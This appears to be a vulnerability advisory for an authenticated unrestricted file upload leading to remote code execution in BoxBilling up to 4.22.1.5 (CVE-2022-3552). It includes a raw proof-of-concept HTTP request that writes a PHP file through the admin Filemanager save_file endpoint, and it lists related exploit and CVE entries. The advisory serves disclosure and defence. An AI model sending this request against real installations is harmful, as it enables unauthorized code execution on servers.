Lucene search
Zetc0deC6E2973D-386D-4667-9426-10D10828539BHistorySep 18, 2022 - 11:31 a.m.
BoxBilling <=4.22.1.5 - Authenticated Unrestricted File Upload - RCE
2022-09-1811:31:02
zetc0de
www.huntr.dev
27
0.017 Low
EPSS
Percentile
87.7%
Description
BoxBilling was vulnerable to Unrestricted File Upload. In order to exploit the vulnerability, an attacker must have a valid authenticated session as admin on the CMS. With at least 1 order of product an attacker can upload malicious file to hidden API endpoint that contain a webshell and get RCE.
Proof of Concept
POST /index.php?_url=/api/admin/Filemanager/save_file HTTP/1.1
Host: local.com:8089
Content-Length: 52
Accept: application/json, text/javascript, */*; q=0.01
DNT: 1
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=3nrf9i4mv28o5anva77ltq042d
Connection: close
order_id=1&path=ax.php&data=<%3fphp+phpinfo()%3b%3f>
Video POC :
https://drive.google.com/file/d/1m2glCeJ9QXc8epuY2QfvbWwjLTJ8_Hjx/view?usp=sharing
Related
packetstorm
packetstorm
BoxBilling 4.22.1.5 Remote Code Execution
2023-03-28 00:00:00
githubexploit
githubexploit
Exploit for Unrestricted Upload of File with Dangerous Type in Boxbilling
2023-04-01 11:53:14
prion
prion
Unrestricted file upload
2022-10-17 21:15:00
cve
cve
CVE-2022-3552
2022-10-17 21:15:10
osv
osv
CVE-2022-3552
2022-10-17 21:15:10
nvd
nvd
CVE-2022-3552
2022-10-17 21:15:10
cvelist
cvelist
zdt
zdt
BoxBilling <= 4.22.1.5 - Remote Code Execution Vulnerability
2023-03-28 00:00:00
exploitdb
exploitdb
BoxBilling<=4.22.1.5 - Remote Code Execution (RCE)
2023-03-28 00:00:00